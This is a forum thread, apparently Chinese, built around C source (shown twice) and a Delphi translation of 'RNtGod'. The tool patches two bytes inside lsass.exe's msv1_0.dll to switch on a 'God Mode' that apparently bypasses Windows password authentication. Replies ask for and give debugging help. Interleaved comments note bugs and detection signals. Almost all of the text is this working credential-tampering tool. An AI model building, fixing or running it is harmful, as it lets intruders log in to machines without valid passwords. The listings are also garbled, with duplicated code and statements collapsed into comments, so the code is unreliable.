#include "stdafx.h"
#include "windows.h"
#include "tlhelp32.h"
#include "stdio.h"// 提权函数
// Enable SeDebugPrivilege on the current process token so that a later
// OpenProcess() on a protected system process (here lsass.exe) can succeed.
// Returns the BOOL from AdjustTokenPrivileges; that is TRUE even when the
// privilege was not actually granted (GetLastError() == ERROR_NOT_ALL_ASSIGNED),
// which this code does not check.
// NOTE(review): hToken is uninitialised and is closed even when
// OpenProcessToken fails. GetCurrentProcess() returns a pseudo-handle that
// needs no CloseHandle.
// Detection note: a non-debugger process enabling SeDebugPrivilege is the
// usual precursor to opening lsass.exe and is worth alerting on.
BOOL EnableDebugPriv(void)
{
HANDLE hToken;
HANDLE hProcess = GetCurrentProcess();
BOOL bREt = FALSE; if ( OpenProcessToken(hProcess, TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken) )
{
TOKEN_PRIVILEGES tkp;
if ( LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &tkp.Privileges[0].Luid) )
{
tkp.PrivilegeCount = 1;
tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
bREt = AdjustTokenPrivileges(hToken, FALSE, &tkp, 0, NULL, 0);
}
}
CloseHandle(hToken);
return bREt;
}// Find the PID of the target process by image name
// Walk a Toolhelp process snapshot and return the PID of the first process
// whose image name equals pn (case-insensitive); 0 if none matches.
// NOTE(review): the snapshot result is not validated and the handle hnd is
// never closed on either return path.
DWORD GetTargetPid(char *pn)
{
BOOL b;
HANDLE hnd;
PROCESSENTRY32 pe; hnd = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); pe.dwSize = sizeof(pe);
b=Process32First(hnd, &pe);
while(b)
{
if (lstrcmpi(pn, pe.szExeFile) == 0)
return pe.th32ProcessID;
b=Process32Next(hnd,&pe);
} return 0;
}// Get the signature offset
// Resolve the signature offset: load dn into this process and scan its image
// with inline x86 asm for the byte pattern 8B 4D 0C 49, then continue from
// there for 32 C0; the address of the second match is stored in dwSinatureAddr.
// Returns that address minus the load base (an RVA), or (DWORD)-1 when
// LoadLibrary fails.
// NOTE(review): ebx is pushed but never loaded before [ebx] is written, and
// hLib is never moved into a register, so the scan starts from whatever
// ebx/eax hold at entry. The scan has no upper bound (the module size is not
// consulted), and dwSinatureAddr is only assigned on the match path.
DWORD GetSinatureAddr(char *dn)
{
HMODULE hLib;
DWORD dwSinatureAddr; hLib = LoadLibrary(dn);
if ( hLib )
{
// Signature check. Register roles: [ebx] = scan cursor (address of the byte
// under test), eax = scratch. Labels that appear glued onto the preceding
// instruction below are an artefact of the paste; originally they stood on
// their own lines.
__asm
{
push ebx                        ; preserve callee-saved ebx
mov dword ptr [ebx], eax        ; cursor = eax (ebx is not set up here, see note above)
xor eax, eaxcheck_1_start:
mov eax, dword ptr [ebx]
cmp byte ptr [eax], 0x8B        ; pattern 1, byte 0
jnz short check_1_end
mov eax, dword ptr [ebx]
inc eax
cmp byte ptr [eax], 0x4D        ; pattern 1, byte 1
jnz short check_1_end
mov eax, dword ptr [ebx]
add eax, 2
cmp byte ptr [eax], 0x0C        ; pattern 1, byte 2
jnz short check_1_end
mov eax, dword ptr [ebx]
add eax, 3
cmp byte ptr [eax], 0x49        ; pattern 1, byte 3 -> 8B 4D 0C 49 found
je short check_2_start
check_1_end:
inc dword ptr [ebx]             ; cursor++, retry pattern 1
jmp short check_1_startcheck_2_start:
mov eax, dword ptr [ebx]
cmp byte ptr [eax], 0x32        ; pattern 2, byte 0
jnz short check_2_end
mov eax, dword ptr [ebx]
inc eax
cmp byte ptr [eax], 0x0c0       ; pattern 2, byte 1 -> 32 C0 found
jnz short check_2_end
mov eax, dword ptr [ebx]
push eax
lea eax, dwSinatureAddr
pop dword ptr [eax]             ; dwSinatureAddr = cursor (absolute address of the 32 C0 match)
mov eax, dword ptr [ebx]
jmp short check__overcheck_2_end:
inc dword ptr [ebx]             ; cursor++, retry pattern 2
jmp short check_2_startcheck__over:
xor eax, eax
pop ebx                         ; restore ebx
} } else
{
printf("Failt to found the Sinature offset.\n");
return -1;
} dwSinatureAddr = dwSinatureAddr - (DWORD)hLib;   // absolute address -> RVA
//printf("%08x , %x\n", dwSinatureAddr, hLib);
FreeLibrary(hLib); return dwSinatureAddr;
}// Get the base address of msv1_0.dll (module dn) inside the target process
// Enumerate the modules of process dwTargetPid with a Toolhelp snapshot and
// return the load base of the one whose name equals dn (case-insensitive);
// 0 if it is not found.
// NOTE(review): the snapshot handle is not validated before Module32First, and
// the loop condition only ever sees the Module32First result — the return
// value of Module32Next is discarded, so when dn is absent the loop never ends.
DWORD GetModBase (DWORD dwTargetPid, char *dn)
{
DWORD dwModBase = NULL;
HANDLE hModuleSnap;
MODULEENTRY32 lpModInfo = {0};
BOOL bModule = NULL; lpModInfo.dwSize = sizeof(lpModInfo);
hModuleSnap = CreateToolhelp32Snapshot(TH32CS_SNAPMODULE, dwTargetPid);
bModule = Module32First(hModuleSnap, &lpModInfo); while ( bModule )
{
if (lstrcmpi(dn, lpModInfo.szModule) == 0)
{
dwModBase = (DWORD)lpModInfo.modBaseAddr;
//printf("%x\n", dwModBase);
break;
}
Module32Next(hModuleSnap, &lpModInfo);          // result ignored (see note above)
} CloseHandle(hModuleSnap);
return dwModBase;
}// Virtual address conversion
// Convert the signature's module-relative offset into an address inside the
// target process by adding the module's load base there.
// In:  dwSinatureAddr = RVA from GetSinatureAddr; dwModBase = base from GetModBase
// Out: dwSinatureAddr + dwModBase (plain DWORD addition, wraps on overflow)
DWORD GetSinatureViraddr(DWORD dwSinatureAddr, DWORD dwModBase)
{
const DWORD dwVirAddr = dwModBase + dwSinatureAddr;
return dwVirAddr;
}// Password-removal (patch) function
// Patch routine: write two bytes into the target process at dwSinatureVirAddr.
// checkbuff == "on" (case-insensitive) writes buff1 ("\xB0\x10"); any other
// value writes buff2 ("\x32\xC0"), the bytes the signature scan matched, i.e.
// puts the original code back.
// NOTE(review): dwTargetPid is reused as the lpflOldProtect out-parameter, so
// after the first VirtualProtectEx it holds the previous protection and the
// second call restores it only by that accident. OpenProcess and
// WriteProcessMemory results are unchecked and hProcess is never closed.
// Detection/mitigation note: OpenProcess(PROCESS_ALL_ACCESS) on lsass.exe
// followed by VirtualProtectEx and WriteProcessMemory is a high-confidence
// credential-tampering signal for EDR; LSA Protection (RunAsPPL) denies this
// handle to non-protected processes.
void FuckPassword (char *checkbuff, DWORD dwTargetPid, DWORD dwSinatureVirAddr)
{
HANDLE hProcess = NULL;
char buff1[] = "\xB0\x10";
char buff2[] = "\x32\xC0";
hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwTargetPid); VirtualProtectEx(hProcess, (void *)dwSinatureVirAddr, 2, PAGE_READWRITE, &dwTargetPid); if ( lstrcmpi("on", checkbuff) == 0 )
{
WriteProcessMemory(hProcess, (void *)dwSinatureVirAddr, buff1, 2, 0);
printf("Open God Mode");
}
else
{
WriteProcessMemory(hProcess, (void *)dwSinatureVirAddr, buff2, 2, 0);
printf("Close God Mode");
} VirtualProtectEx(hProcess, (void *)dwSinatureVirAddr, 2, dwTargetPid, &dwTargetPid);   // dwTargetPid now holds the old protection
}// Banner function
// Print the program banner (name, author and provenance) to stdout.
// Each entry already carries its trailing newline, so it is written verbatim.
void CopyRightInfo()
{
static const char *const banner[] = {
"------------------------------------------\n",
"RNtGod\n",
"Author: Cyg07\n",
"Reverse from golds7n[LAG]'s NtGod\n",
"------------------------------------------\n",
};
for (size_t i = 0; i < sizeof(banner) / sizeof(banner[0]); ++i)
fputs(banner[i], stdout);
}
// Entry point. Usage: <exe> On|OFF. Resolves the signature RVA from a local
// copy of msv1_0.dll, enables SeDebugPrivilege, locates lsass.exe and the
// module base inside it, and hands the computed address to FuckPassword.
// NOTE(review): none of the intermediate results are validated — a -1 from
// GetSinatureAddr, a 0 PID from GetTargetPid or a 0 base from GetModBase all
// propagate into the cross-process write. `EnableDebugPriv() == NULL`
// compares a BOOL with a pointer constant (FALSE is the idiomatic spelling).
int main(int argc, char* argv[])
{
CopyRightInfo(); if (argc < 2)
{
printf("Usage: %s On|OFF\n\n", argv[0]);
return 0;
} char *DllName = "msv1_0.dll"; // Dll
char *ProcessName = "lsass.exe"; // target process
DWORD dwModBase = NULL; // base address of the DLL in memory
DWORD dwSinatureAddr = NULL; // signature offset
// NOTE(review): the paste collapsed the next two statements (the GetSinatureAddr
// call and the EnableDebugPriv() check) into the trailing comment of the next line.
DWORD dwSinatureVirAddr = NULL; // 特征码的虚拟地址 dwSinatureAddr = GetSinatureAddr(DllName); // 获取特征码偏移 if ( EnableDebugPriv() == NULL ) // 进程提权
{
printf("Failt to enable debug priv.\n");
}
DWORD dwTargetPid = GetTargetPid(ProcessName); // find the lsass.exe process
// NOTE(review): likewise, the GetModBase and GetSinatureViraddr calls were
// collapsed into the commented-out printf on the next line.
// printf("%d\n", dwTargetPid); dwModBase = GetModBase(dwTargetPid, DllName); // 获取基地址 dwSinatureVirAddr = GetSinatureViraddr(dwSinatureAddr, dwModBase); // 转换特征码在内存的虚拟地址 // 密码处理函数
FuckPassword(argv[1], dwTargetPid, dwSinatureVirAddr); return 0;
}
#include "windows.h"
#include "tlhelp32.h"
#include "stdio.h"// 提权函数
// Enable SeDebugPrivilege on the current process token so that a later
// OpenProcess() on a protected system process (here lsass.exe) can succeed.
// Returns the BOOL from AdjustTokenPrivileges; that is TRUE even when the
// privilege was not actually granted (GetLastError() == ERROR_NOT_ALL_ASSIGNED),
// which this code does not check.
// NOTE(review): hToken is uninitialised and is closed even when
// OpenProcessToken fails. GetCurrentProcess() returns a pseudo-handle that
// needs no CloseHandle.
// Detection note: a non-debugger process enabling SeDebugPrivilege is the
// usual precursor to opening lsass.exe and is worth alerting on.
BOOL EnableDebugPriv(void)
{
HANDLE hToken;
HANDLE hProcess = GetCurrentProcess();
BOOL bREt = FALSE; if ( OpenProcessToken(hProcess, TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken) )
{
TOKEN_PRIVILEGES tkp;
if ( LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &tkp.Privileges[0].Luid) )
{
tkp.PrivilegeCount = 1;
tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
bREt = AdjustTokenPrivileges(hToken, FALSE, &tkp, 0, NULL, 0);
}
}
CloseHandle(hToken);
return bREt;
}// Find the PID of the target process by image name
// Walk a Toolhelp process snapshot and return the PID of the first process
// whose image name equals pn (case-insensitive); 0 if none matches.
// NOTE(review): the snapshot result is not validated and the handle hnd is
// never closed on either return path.
DWORD GetTargetPid(char *pn)
{
BOOL b;
HANDLE hnd;
PROCESSENTRY32 pe; hnd = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); pe.dwSize = sizeof(pe);
b=Process32First(hnd, &pe);
while(b)
{
if (lstrcmpi(pn, pe.szExeFile) == 0)
return pe.th32ProcessID;
b=Process32Next(hnd,&pe);
} return 0;
}// Get the signature offset
// Resolve the signature offset: load dn into this process and scan its image
// with inline x86 asm for the byte pattern 8B 4D 0C 49, then continue from
// there for 32 C0; the address of the second match is stored in dwSinatureAddr.
// Returns that address minus the load base (an RVA), or (DWORD)-1 when
// LoadLibrary fails.
// NOTE(review): ebx is pushed but never loaded before [ebx] is written, and
// hLib is never moved into a register, so the scan starts from whatever
// ebx/eax hold at entry. The scan has no upper bound (the module size is not
// consulted), and dwSinatureAddr is only assigned on the match path.
DWORD GetSinatureAddr(char *dn)
{
HMODULE hLib;
DWORD dwSinatureAddr; hLib = LoadLibrary(dn);
if ( hLib )
{
// Signature check. Register roles: [ebx] = scan cursor (address of the byte
// under test), eax = scratch. Labels that appear glued onto the preceding
// instruction below are an artefact of the paste; originally they stood on
// their own lines.
__asm
{
push ebx                        ; preserve callee-saved ebx
mov dword ptr [ebx], eax        ; cursor = eax (ebx is not set up here, see note above)
xor eax, eaxcheck_1_start:
mov eax, dword ptr [ebx]
cmp byte ptr [eax], 0x8B        ; pattern 1, byte 0
jnz short check_1_end
mov eax, dword ptr [ebx]
inc eax
cmp byte ptr [eax], 0x4D        ; pattern 1, byte 1
jnz short check_1_end
mov eax, dword ptr [ebx]
add eax, 2
cmp byte ptr [eax], 0x0C        ; pattern 1, byte 2
jnz short check_1_end
mov eax, dword ptr [ebx]
add eax, 3
cmp byte ptr [eax], 0x49        ; pattern 1, byte 3 -> 8B 4D 0C 49 found
je short check_2_start
check_1_end:
inc dword ptr [ebx]             ; cursor++, retry pattern 1
jmp short check_1_startcheck_2_start:
mov eax, dword ptr [ebx]
cmp byte ptr [eax], 0x32        ; pattern 2, byte 0
jnz short check_2_end
mov eax, dword ptr [ebx]
inc eax
cmp byte ptr [eax], 0x0c0       ; pattern 2, byte 1 -> 32 C0 found
jnz short check_2_end
mov eax, dword ptr [ebx]
push eax
lea eax, dwSinatureAddr
pop dword ptr [eax]             ; dwSinatureAddr = cursor (absolute address of the 32 C0 match)
mov eax, dword ptr [ebx]
jmp short check__overcheck_2_end:
inc dword ptr [ebx]             ; cursor++, retry pattern 2
jmp short check_2_startcheck__over:
xor eax, eax
pop ebx                         ; restore ebx
} } else
{
printf("Failt to found the Sinature offset.\n");
return -1;
} dwSinatureAddr = dwSinatureAddr - (DWORD)hLib;   // absolute address -> RVA
//printf("%08x , %x\n", dwSinatureAddr, hLib);
FreeLibrary(hLib); return dwSinatureAddr;
}// Get the base address of msv1_0.dll (module dn) inside the target process
// Enumerate the modules of process dwTargetPid with a Toolhelp snapshot and
// return the load base of the one whose name equals dn (case-insensitive);
// 0 if it is not found.
// NOTE(review): the snapshot handle is not validated before Module32First, and
// the loop condition only ever sees the Module32First result — the return
// value of Module32Next is discarded, so when dn is absent the loop never ends.
DWORD GetModBase (DWORD dwTargetPid, char *dn)
{
DWORD dwModBase = NULL;
HANDLE hModuleSnap;
MODULEENTRY32 lpModInfo = {0};
BOOL bModule = NULL; lpModInfo.dwSize = sizeof(lpModInfo);
hModuleSnap = CreateToolhelp32Snapshot(TH32CS_SNAPMODULE, dwTargetPid);
bModule = Module32First(hModuleSnap, &lpModInfo); while ( bModule )
{
if (lstrcmpi(dn, lpModInfo.szModule) == 0)
{
dwModBase = (DWORD)lpModInfo.modBaseAddr;
//printf("%x\n", dwModBase);
break;
}
Module32Next(hModuleSnap, &lpModInfo);          // result ignored (see note above)
} CloseHandle(hModuleSnap);
return dwModBase;
}// Virtual address conversion
// Convert the signature's module-relative offset into an address inside the
// target process by adding the module's load base there.
// In:  dwSinatureAddr = RVA from GetSinatureAddr; dwModBase = base from GetModBase
// Out: dwSinatureAddr + dwModBase (plain DWORD addition, wraps on overflow)
DWORD GetSinatureViraddr(DWORD dwSinatureAddr, DWORD dwModBase)
{
const DWORD dwVirAddr = dwModBase + dwSinatureAddr;
return dwVirAddr;
}// Password-removal (patch) function
// Patch routine: write two bytes into the target process at dwSinatureVirAddr.
// checkbuff == "on" (case-insensitive) writes buff1 ("\xB0\x10"); any other
// value writes buff2 ("\x32\xC0"), the bytes the signature scan matched, i.e.
// puts the original code back.
// NOTE(review): dwTargetPid is reused as the lpflOldProtect out-parameter, so
// after the first VirtualProtectEx it holds the previous protection and the
// second call restores it only by that accident. OpenProcess and
// WriteProcessMemory results are unchecked and hProcess is never closed.
// Detection/mitigation note: OpenProcess(PROCESS_ALL_ACCESS) on lsass.exe
// followed by VirtualProtectEx and WriteProcessMemory is a high-confidence
// credential-tampering signal for EDR; LSA Protection (RunAsPPL) denies this
// handle to non-protected processes.
void FuckPassword (char *checkbuff, DWORD dwTargetPid, DWORD dwSinatureVirAddr)
{
HANDLE hProcess = NULL;
char buff1[] = "\xB0\x10";
char buff2[] = "\x32\xC0";
hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwTargetPid); VirtualProtectEx(hProcess, (void *)dwSinatureVirAddr, 2, PAGE_READWRITE, &dwTargetPid); if ( lstrcmpi("on", checkbuff) == 0 )
{
WriteProcessMemory(hProcess, (void *)dwSinatureVirAddr, buff1, 2, 0);
printf("Open God Mode");
}
else
{
WriteProcessMemory(hProcess, (void *)dwSinatureVirAddr, buff2, 2, 0);
printf("Close God Mode");
} VirtualProtectEx(hProcess, (void *)dwSinatureVirAddr, 2, dwTargetPid, &dwTargetPid);   // dwTargetPid now holds the old protection
}// Banner function
// Print the program banner (name, author and provenance) to stdout.
// Each entry already carries its trailing newline, so it is written verbatim.
void CopyRightInfo()
{
static const char *const banner[] = {
"------------------------------------------\n",
"RNtGod\n",
"Author: Cyg07\n",
"Reverse from golds7n[LAG]'s NtGod\n",
"------------------------------------------\n",
};
for (size_t i = 0; i < sizeof(banner) / sizeof(banner[0]); ++i)
fputs(banner[i], stdout);
}
// Entry point. Usage: <exe> On|OFF. Resolves the signature RVA from a local
// copy of msv1_0.dll, enables SeDebugPrivilege, locates lsass.exe and the
// module base inside it, and hands the computed address to FuckPassword.
// NOTE(review): none of the intermediate results are validated — a -1 from
// GetSinatureAddr, a 0 PID from GetTargetPid or a 0 base from GetModBase all
// propagate into the cross-process write. `EnableDebugPriv() == NULL`
// compares a BOOL with a pointer constant (FALSE is the idiomatic spelling).
int main(int argc, char* argv[])
{
CopyRightInfo(); if (argc < 2)
{
printf("Usage: %s On|OFF\n\n", argv[0]);
return 0;
} char *DllName = "msv1_0.dll"; // Dll
char *ProcessName = "lsass.exe"; // target process
DWORD dwModBase = NULL; // base address of the DLL in memory
DWORD dwSinatureAddr = NULL; // signature offset
// NOTE(review): the paste collapsed the next two statements (the GetSinatureAddr
// call and the EnableDebugPriv() check) into the trailing comment of the next line.
DWORD dwSinatureVirAddr = NULL; // 特征码的虚拟地址 dwSinatureAddr = GetSinatureAddr(DllName); // 获取特征码偏移 if ( EnableDebugPriv() == NULL ) // 进程提权
{
printf("Failt to enable debug priv.\n");
}
DWORD dwTargetPid = GetTargetPid(ProcessName); // find the lsass.exe process
// NOTE(review): likewise, the GetModBase and GetSinatureViraddr calls were
// collapsed into the commented-out printf on the next line.
// printf("%d\n", dwTargetPid); dwModBase = GetModBase(dwTargetPid, DllName); // 获取基地址 dwSinatureVirAddr = GetSinatureViraddr(dwSinatureAddr, dwModBase); // 转换特征码在内存的虚拟地址 // 密码处理函数
FuckPassword(argv[1], dwTargetPid, dwSinatureVirAddr); return 0;
}
C的,直接就弄成DLL
在 Delphi里调用就成了
Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
Dialogs, StdCtrls,TlHelp32, ExtCtrls;type
TForm1 = class(TForm)
rg1: TRadioGroup;
Buttonbtn1: TButton;                          // "on" button (see Buttonbtn1Click)
Buttonbtn2: TButton;                          // "off" button (see Buttonbtn2Click)
procedure Buttonbtn1Click(Sender: TObject);
procedure FormCreate(Sender: TObject);
procedure Buttonbtn2Click(Sender: TObject);
private
{ Private declarations }
public
{ Public declarations }
end;var
Form1: TForm1;
b:Boolean;                                    // global mode flag read by FuckPassWord: True -> buff1, False -> buff2
dwgetpid:DWORD;                               // PID of the target process (lsass.exe), set by the button handlers
implementation{$R *.dfm}procedure GetDebugPrivs; // Raise privileges: enable SeDebugPrivilege on the current process token
// NOTE(review): the results of LookupPrivilegeValue and AdjustTokenPrivileges
// are ignored and hToken is never closed, so callers cannot tell whether the
// privilege was actually granted. Detection note: a non-debugger process
// enabling SeDebugPrivilege is the usual precursor to opening lsass.exe.
var
hToken: THandle;
tkp: TTokenPrivileges;
retval: dword; // receives ReturnLength from AdjustTokenPrivileges; never read
begin
If(OpenProcessToken(GetCurrentProcess, TOKEN_ADJUST_PRIVILEGES or TOKEN_QUERY, hToken)) then
begin
LookupPrivilegeValue(nil,'SeDebugPrivilege',tkp.Privileges[0].Luid);
tkp.PrivilegeCount := 1;
tkp.Privileges[0].Attributes := SE_PRIVILEGE_ENABLED;
AdjustTokenPrivileges(hToken, False, tkp, 0, nil, retval);
end;
end; Function GetPID(_GetPID:PChar):DWORD;
// Return the PID of the first process whose image name equals _GetPID.
// NOTE(review): Result is left unassigned when nothing matches, the snapshot
// handle h is never closed, and the `=` comparison appears to be
// case-sensitive (the C original used lstrcmpi).
var
h:thandle;
f:boolean;
lppe:tprocessentry32;
begin
h := CreateToolhelp32Snapshot(TH32cs_SnapProcess, 0);
lppe.dwSize := sizeof(lppe);
f := Process32First(h, lppe); // lppe.szExeFile is the process image name; pick the one you need
// lppe.th32ProcessID is the process id you are after
while integer(f) <> 0 do
begin
//if lppe.szExeFile='QQ.exe' then showmessage('ok');
if lppe.szExeFile = _GetPID then
begin
Result:=lppe.th32ProcessID;
break;
end;
f := Process32Next(h, lppe);
end;
end;function GetSinatureAddr(dn:PChar):DWORD; // Get the signature offset (RVA) inside module dn
// Loads dn into this process and scans it with inline asm for the byte pattern
// 8B 4D 0C 49, then from there for 32 C0; the address of the second match is
// stored in dwSinatureAddr and returned minus the load base.
// NOTE(review): the else branch does not Exit — it reads the unassigned Result
// and then falls through to the subtraction and FreeLibrary(0). Inside the asm
// block ebx is pushed but never loaded before [ebx] is written and hLib is never
// moved into a register, so the scan starts from whatever ebx/eax hold at
// entry; the scan also has no upper bound. '\n' in the ShowMessage text is not
// an escape sequence in Delphi.
var
hLib: HMODULE;
dwSinatureAddr:DWORD;
begin
hLib:= LoadLibrary(dn);
if (hLib <> 0) then
begin
asm // Signature check. [ebx] = scan cursor, eax = scratch. Labels glued onto
    // the preceding instruction below are an artefact of the paste.
push ebx // preserve callee-saved ebx
mov dword ptr [ebx], eax // cursor = eax (ebx is not set up here, see note above)
xor eax, eax@check_1_start:
mov eax, dword ptr [ebx]
cmp byte ptr [eax], $8B // pattern 1, byte 0
jnz @check_1_end
mov eax, dword ptr [ebx]
inc eax
cmp byte ptr [eax], $4D // pattern 1, byte 1
jnz @check_1_end
mov eax, dword ptr [ebx]
add eax, 2
cmp byte ptr [eax], $0C // pattern 1, byte 2
jnz @check_1_end
mov eax, dword ptr [ebx]
add eax, 3
cmp byte ptr [eax], $49 // pattern 1, byte 3 -> 8B 4D 0C 49 found
je @check_2_start
@check_1_end:
inc dword ptr [ebx] // cursor++, retry pattern 1
jmp @check_1_start@check_2_start:
mov eax, dword ptr [ebx]
cmp byte ptr [eax], $32 // pattern 2, byte 0
jnz @check_2_end
mov eax, dword ptr [ebx]
inc eax
cmp byte ptr [eax], $0c0 // pattern 2, byte 1 -> 32 C0 found
jnz @check_2_end
mov eax, dword ptr [ebx]
push eax
lea eax, dwSinatureAddr
pop dword ptr [eax] // dwSinatureAddr = cursor (absolute address of the 32 C0 match)
mov eax, dword ptr [ebx]
jmp @check__over@check_2_end:
inc dword ptr [ebx] // cursor++, retry pattern 2
jmp @check_2_start@check__over:
xor eax, eax
pop ebx // restore ebx
end;
end
else
begin
ShowMessage('Failt to found the Sinature offset.\n');
Result:= Result - 1; // Result is unassigned here (see note above)
end;
dwSinatureAddr:= dwSinatureAddr - hLib; // absolute address -> RVA
FreeLibrary(hLib);
Result:= dwSinatureAddr;
end;function GetModuleHandle2(ProcessID:Dword;sDllName: string):DWORD; // Get the in-memory base of module sDllName (msv1_0.dll) in process ProcessID
// Compares the file-name part of each module path with sDllName, case-insensitively.
// NOTE(review): Result is unassigned when the snapshot fails or the module is
// absent; th32handle is never closed; `finded` is set but never read. hModule
// is returned where the C version used modBaseAddr — assumed to be the same
// value, verify.
var
th32handle: THandle;
me32:TModuleEntry32;
finded : Boolean;
begin
finded := False;
th32handle:=CreateToolhelp32Snapshot(TH32CS_SNAPMODULE,ProcessID);
if th32handle = INVALID_HANDLE_VALUE then Exit; // Result undefined on this path
me32.dwSize := sizeof(TModuleEntry32);
if Module32First( th32handle,me32 ) then
repeat
if AnsiStricomp(PChar(ExtractFilename(me32.szExePath )), PChar(ExtractFilename(sDllName))) = 0 then
begin
Result := me32.hModule ;
break;
end;
until not Module32Next(th32handle,me32);
end;function GetSinatureViraddr(dwSinatureAddr,dwModBase:Dword):Dword; // Virtual address conversion: RVA + module base inside the target process
begin
Result:= dwSinatureAddr + dwModBase;
end;procedure FuckPassWord(checkbuff:Pointer;dwTargetpid:DWORD;dwSinatureViraddr:DWORD);
// Patch routine: write two bytes into process dwTargetpid at dwSinatureViraddr.
// The global b selects the payload (True -> buff1, False -> buff2); checkbuff
// is unused (callers pass nil).
// NOTE(review): buff2 here is ($32,$10) whereas the C original restores
// "\x32\xC0", so the "off" path does not put the matched bytes back.
// ptr(dwTargetpid) is passed where VirtualProtectEx expects a pointer that
// receives the old protection, so the call writes to a bogus address (and
// most likely fails); the protection is never restored; OpenProcess and
// WriteProcessMemory results are unchecked and hProcess is never closed.
// Detection/mitigation note: OpenProcess(PROCESS_ALL_ACCESS) on lsass.exe
// followed by VirtualProtectEx and WriteProcessMemory is a high-confidence
// credential-tampering signal; LSA Protection (RunAsPPL) denies this handle
// to non-protected processes.
var
hProcess: THandle;
lpNumberOfBytes:DWord;
const
buff1: array[0..1] of Byte = ($B0,$10); // "on" payload
buff2: array[0..1] of Byte = ($32,$10);begin
lpNumberOfBytes:= 0;
hProcess:= OpenProcess(PROCESS_ALL_ACCESS,False,dwTargetpid);
VirtualProtectEx(hProcess,ptr(dwsinatureviraddr),2,PAGE_READWRITE,ptr(dwTargetpid));
if b then
begin
WriteProcessMemory(hProcess,Ptr(dwSinatureViraddr),@buff1,2,lpNumberOfBytes);
ShowMessage('Open God Mode');
end
else
begin
WriteProcessMemory(hProcess,Ptr(dwSinatureViraddr),@buff2,2,lpNumberOfBytes);
ShowMessage('Close God Mode');
end;
end;
procedure TForm1.Buttonbtn1Click(Sender: TObject);
// "On" button: resolve the signature RVA from a local copy of msv1_0.dll,
// enable SeDebugPrivilege, find lsass.exe and the module base inside it, then
// call FuckPassWord with b = True.
// NOTE(review): none of the intermediate results are validated — an unassigned
// base, a 0 PID or a failed scan all propagate into the cross-process write.
// The `begin b:= True;` that opens the body was swallowed into the trailing
// comment of the last declaration by the paste.
var
DllName:pchar; // Dll
ProcessName:PChar; // target process name
dwModBase: DWORD; // base address of the DLL in memory
dwSinatureAddr: DWORD; // signature offset
dwSinatureVirAddr: DWORD; // 特征码的虚拟地址begin b:= True;
DllName:= 'msv1_0.dll';
ProcessName:='lsass.exe';
dwSinatureAddr:= GetSinatureAddr(DllName); // signature offset (RVA)
GetDebugPrivs; // raise privileges
dwgetpid:= GetPID(ProcessName); // find the lsass.exe process
dwModBase:= GetModuleHandle2(dwgetpid, DllName);// module base inside the target
dwSinatureVirAddr:= GetSinatureViraddr(dwSinatureAddr, dwModBase); // signature address inside the target
FuckPassword(nil,dwgetpid,dwSinatureVirAddr); // apply the patch (checkbuff unused; mode comes from global b)
end;procedure TForm1.FormCreate(Sender: TObject);
// Start in the "off" state.
begin
b:= False;
end;procedure TForm1.Buttonbtn2Click(Sender: TObject);
// "Off" button: same sequence as Buttonbtn1Click with b = False, plus a debug
// ShowMessage of the module base. The NOTE on Buttonbtn1Click applies here too.
var
DllName:pchar; // Dll
ProcessName:PChar; // target process name
dwModBase: DWORD; // base address of the DLL in memory
dwSinatureAddr: DWORD; // signature offset
dwSinatureVirAddr: DWORD; // 特征码的虚拟地址begin
b:= False;
DllName:= 'msv1_0.dll';
ProcessName:='lsass.exe';
dwSinatureAddr:= GetSinatureAddr(DllName); // signature offset (RVA)
GetDebugPrivs; // raise privileges
dwgetpid:= GetPID(ProcessName); // find the lsass.exe process
dwModBase:= GetModuleHandle2(dwgetpid, DllName);// module base inside the target
ShowMessage(IntToStr(dwModBase)); // debug output: shows the (possibly unassigned) base
dwSinatureVirAddr:= GetSinatureViraddr(dwSinatureAddr, dwModBase); // signature address inside the target
FuckPassword(nil,dwgetpid,dwSinatureVirAddr); // apply the patch (checkbuff unused; mode comes from global b)
end;end.
自己翻译的,虽然编译通过,但问题好多,求大神帮助
也和我以前一样,翻译VC++到DELPHI啊?!
var
hLib: HMODULE;
dwSinatureAddr:DWORD;
begin
hLib:= LoadLibrary(dn);
if (hLib <> 0) then
begin
asm // 特征码校验
push ebx
mov dword ptr [ebx], hLib
xor eax, eax@check_1_start:
mov eax, dword ptr [ebx]
cmp byte ptr [eax], $8B
jnz @check_1_end
mov eax, dword ptr [ebx]
inc eax
cmp byte ptr [eax], $4D
jnz @check_1_end
mov eax, dword ptr [ebx]
add eax, 2
cmp byte ptr [eax], $0C
jnz @check_1_end
mov eax, dword ptr [ebx]
add eax, 3
cmp byte ptr [eax], $49
je @check_2_start
@check_1_end:
inc dword ptr [ebx]
jmp @check_1_start@check_2_start:
mov eax, dword ptr [ebx]
cmp byte ptr [eax], $32
jnz @check_2_end
mov eax, dword ptr [ebx]
inc eax
cmp byte ptr [eax], $0c0
jnz @check_2_end
mov eax, dword ptr [ebx]
push eax
lea eax, dwSinatureAddr
pop dword ptr [eax]
mov eax, dword ptr [ebx]
jmp @check__over@check_2_end:
inc dword ptr [ebx]
jmp @check_2_start@check__over:
xor eax, eax
pop ebx
end;
end
else
begin
ShowMessage('Failt to found the Sinature offset.\n');
Result:= Result - 1;
end;
dwSinatureAddr:= dwSinatureAddr - hLib;
FreeLibrary(hLib);
Result:= dwSinatureAddr;
end;把eax传值,直接改为变量~~
再看看~~
第二个参数不对吧~~ if ( lstrcmpi("on", checkbuff) == 0 ) 问题太多,我闪了~~